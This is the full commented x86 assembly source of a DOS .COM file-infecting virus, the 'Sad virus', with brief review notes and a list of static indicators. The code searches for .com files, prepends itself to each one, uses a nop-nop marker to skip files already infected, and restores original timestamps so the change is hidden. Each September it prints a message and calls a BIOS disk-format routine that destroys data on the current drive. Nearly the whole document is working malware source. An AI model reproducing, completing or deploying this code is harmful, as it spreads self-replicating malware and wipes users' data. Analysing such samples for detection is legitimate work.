- ; DOS .COM file infector with a date-triggered payload. Flow as listed:
- ; date check -> optional payload -> infect matching files -> run the host.
- ; ---- Data Segment Values (word slots below 100h, i.e. inside the PSP) ----
-
- ; ds:[0f6h] = offset of the read buffer (host file is read to here)
-
- ; ds:[0f8h] = offset of the write buffer (virus copy, host right after)
-
- ; ds:[0fah] = length of the virus body (begp - 100h)
-
- ; ds:[0fch] = length of the file to be infected
-
- ; ds:[0feh] = offset of the ASCIZ filename of the file to infect
-
- ;
- ; Static indicators visible in this listing: a file that starts with
- ; 90h 90h, the strings at `mess` and `file_type_to_infect`, and the
- ; INT 13h AH=05h call in the payload path.
- .model tiny
-
- .code
-
- org 100h ; origin for .com files
-
- start:
-
-
-
- nop ; these two nop instructions are the infection marker:
-
- nop ; files whose first word is already 9090h are skipped
-
-
-
- ;******
-
- ;get date
-
- ;******
-
- mov ah,2ah ; DOS get date (month is returned in dh)
-
- int 21h ; do it
-
- cmp dh,09h ; is it September?
-
- jnz do_not_activate ; if NO, skip the payload
-
- ;****
-
- ;the nasty bit
-
- ;****
-
- ;*
-
- ;* 1. Print message
-
- ;*
-
- lea dx,mess ; ds:dx -> message text
-
- mov ah,09 ; DOS print '$'-terminated string (prints `mess`;
- ; the original note quoted a different text)
- int 21h ; do it
-
- ;****
-
- ;* 2. Destroy disk
-
- ;****
-
- mov ah,19h ; get current drive (returned in al)
-
- int 21h ; do it
-
- mov dl,al ; dl = drive # to be formatted
-
- mov ah,05 ; disk format function
-
- mov cl,01 ; first sector
-
- mov ch,00 ; first track
-
- mov dh,00 ; head zero
-
- mov al,10h ; al = 10h (16)
-
- int 13h ; do it. NOTE(review): the original notes disagree
-
- ; on the extent (16 sectors vs 16 tracks) - unverified
-
- ; No jump follows: execution continues into do_not_activate below.
-
-
-
- do_not_activate:
- ; Save the command-line area, then lay out the write and read buffers.
- mov cx,80h ; save parameters; set counter to 80h bytes
-
- mov si,0080h ; source: offset 0080h in the current data segment
-
- ; (presumably saved because the file search reuses it)
-
- mov di,0ff7fh ; destination: offset 0ff7fh, near the top of the segment
-
- rep movsb ; copy cx bytes from ds:si to es:di
-
- ; (assumes DF=0 and ES=DS; neither is set in this listing)
-
- ; (cx counts down; si & di advance automatically)
-
-
-
- lea ax,begp ; ax = offset of begp (end of the virus body)
-
- mov cx,ax ; cx = the same offset
-
- sub ax,100h ; subtract start of .com file address (100h) from ax
-
- ; ax now contains the length of the virus
-
-
-
- mov ds:[0fah],ax ; put length of the virus into the data segment at
-
- ; offset 0fah
-
- add cx,fso ; add the word stored at fso (5 as assembled here)
-
- ; so here cx = begp + 5
-
- mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
-
- ; offset 0f8h. ** Start of the write buffer.
-
- ADD CX,AX ; cx += virus length: the read buffer starts right
- ; after the virus copy, so both form one contiguous block
- mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
-
- ; ** Start of the read buffer
-
- mov cx,ax ; mov length of virus into cx
-
- lea si,start ; load address of 'start' (start of virus) into
-
- ; source index
-
- mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
-
- ; destination index
-
-
-
-
-
- rb: ; copy the virus into the write buffer, then look for the first target
- ; cx = counter (length of virus)
- ; si = offset of byte to be read
-
- ; di = offset of where to write byte to
-
- ; (auto decrement of cx & increment of si & di)
-
- rep movsb ; copy the virus body into the write buffer
-
-
-
- stc ; set the carry flag
-
-
-
- lea dx,file_type_to_infect ; ds:dx -> search pattern ('*?.com')
-
- mov ah,4eh ; find first file with specified params
-
- mov cx,20h ; search attribute mask = 20h (archive bit)
-
- int 21h ; do it
-
- ; if file found, CF is cleared, else
-
- ; CF is set
-
-
-
- or ax,ax ; set ZF from ax: the branches below test ax == 0,
- ; not the carry flag
- jz file_found ; ax == 0: treat as file found
-
- jmp done ; otherwise jmp done (restore parameters, run host)
-
-
-
- file_found:
- ; Infect the file found by the search: read it, skip it if marked, rewrite it.
- mov ah,2fh ; get dta (returned in es:bx)
-
- int 21h ; do it
-
- ; DTA+1ah holds the file size, DTA+1eh the ASCIZ file name
-
- mov ax,es:[bx+1ah] ; mov size of file to be infected into ax (low word)
-
- mov ds:[0fch],ax ; mov filesize into ds:[0fch]
-
- add bx,1eh ; bx now points to asciz filename
-
- mov ds:[0feh],bx ; store that offset (not the name itself) in ds:[0feh]
-
- clc ; clear carry flag
-
-
-
- mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
-
- mov dx,bx ; dx = filename offset
-
- int 21h ; do it (ax contains file handle)
-
-
-
- mov bx,ax ; mov file handle into bx
-
-
-
- mov ax,5700h ; get time & date attribs from file to infect
-
- int 21h ; do it (file handle in bx)
-
- push cx ; save time to the stack
-
- push dx ; save date to the stack
-
-
-
- mov ah,3fh ; read from file to be infected
-
- mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
-
- ; be infected)
-
- mov dx,ds:[0f6h] ; buffer (where to read bytes to)
-
- int 21h ; do it
-
-
-
- mov bx,dx ; mov buffer location to bx
-
- mov ax,[bx] ; ax = first word of the data just read
-
- ; (the file's first two bytes)
-
-
-
- ; Now check to see if file is infected... if the
-
- ; file is infected, its first two bytes will be
-
- ; 9090h (nop nop)
-
-
-
- sub ax,9090h ; If file is already infected, zero flag will be set
-
- ; thus jump to fin(ish)
-
- jz fin
-
-
-
-
-
- mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
-
- mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
-
-
-
- mov [bx-2],ax ; store host length in the word just before the read
- ; buffer, i.e. the last word of the virus copy (fso)
-
-
- mov ah,3ch ; Create file with handle
-
- mov cx,00h ; cx=attribs -- set no attributes
-
- mov dx,ds:[0feh] ; point to name
-
- clc ; clear carry flag
-
- int 21h ; create file
-
- ; Note: If filename already exists, (which it does)
-
- ; truncate the filelength to zero - this is ok as
-
- ; we have already copied the file to be infected
-
- ; into memory.
-
-
-
- mov bx,ax ; mov file handle into bx
-
- mov ah,40h ; write file with handle (write to the file to be
-
- ; infected) - length currently zero
-
- ; cx=number of bytes to write
-
- mov cx,ds:[0fch] ; length of file to be infected
-
- add cx,ds:[0fah] ; length of virus
-
- mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
-
- ; + the file to be infected)
-
- int 21h ; write file
-
- ; new file = virus + file to be infected
-
-
-
- mov ax,5701h ; restore original time & date values
-
- pop dx ; get old date from the stack
-
- pop cx ; get old time from the stack
-
- int 21h ; do it
-
- ; Note: Infected file will now carry the time & date
-
- ; it had before the infection.
-
- ; (so the file's date/time is not a sign of the change)
-
- mov ah,3eh ; close file (bx=file handle)
-
- int 21h ; do it
-
- ; NOTE(review): the original note here said the stamps
-
- ; are updated on write, contradicting the note above - confirm
-
-
-
- fin:
- ; Move on to the next matching file; loop back while ax comes back zero.
- stc ; set carry flags
-
- mov ah,4fh ; find next file (.com)
-
- int 21h ; do it
-
- or ax,ax ; set ZF from ax (the carry flag is not tested)
-
- jnz done ; ax != 0: no more .com files, jmp done
-
- JMP file_found ; else begin re-infection process for new file.
-
-
-
- done:
- ; Restore the saved parameters, then hand control to the host program.
- mov cx,80h ; set counter (cx) = 80h
-
- mov si,0ff7fh ; source offset address (copy from here)
-
- mov di,0080h ; destination offset address (copy to here)
-
- rep movsb ; copy bytes! (cx is auto decremented by 1
-
- ; si & di are auto incremented by 1)
-
- ; Note: this is a 'restore parameters' feature
-
- ; this does the reverse of what was done earlier
-
- ; in the program (do_not_activate:)
-
- ; Build a 7-byte stub at ds:0fff9h: 'rep movsb' + 'jmp far cs:0100h'.
-
- mov ax,0a4f3h ; bytes 0f3h,0a4h = opcode of 'rep movsb'
-
- mov ds:[0fff9h],ax ; stub bytes 0-1
-
- mov al,0eah ; 0eah = far jmp opcode
-
- mov ds:[0fffbh],al ; stub byte 2
-
- mov ax,100h ; far jmp offset = 100h (.com entry point)
-
- mov ds:[0fffch],ax ; stub bytes 3-4
-
- lea si,begp ; si = begp: first byte after the virus body (the host)
-
- lea di,start ; di = start: the host is copied back down to here
-
- mov ax,cs ; ax = current code segment
-
- mov ds:[0fffeh],ax ; far jmp segment = cs (stub bytes 5-6)
-
- mov kk,ax ; self-modifying: patch the segment word of the jmp below
-
- mov cx,fso ; cx = byte count for the stub's rep movsb
-
- ; Hand-assembled 'jmp far kk:0fff9h': transfers control to the stub.
-
- db 0eah ; far jmp opcode
-
- dw 0fff9h ; offset of the stub
-
- kk dw 0000h ; segment word, filled in at run time by 'mov kk,ax'
-
-
-
- mess db 'Sad virus - 24/8/91',13,10,'$' ; '$'-terminated message printed by the payload
-
-
-
- file_type_to_infect db '*?.com',0 ; ASCIZ search pattern: .com files only
-
-
-
- fso dw 0005h ; byte count of the code that follows the virus body
-
- ; (5 = size of the exit code at begp in this copy); the
-
- ; infection routine rewrites this word in each copy it writes
-
-
-
-
-
- begp:
- ; End of the virus body. In this copy the code that follows is only a DOS exit.
- mov ax,4c00h ; normal dos termination (set al to 00)
-
- int 21h ; do it
-
-
-
- end start
-
-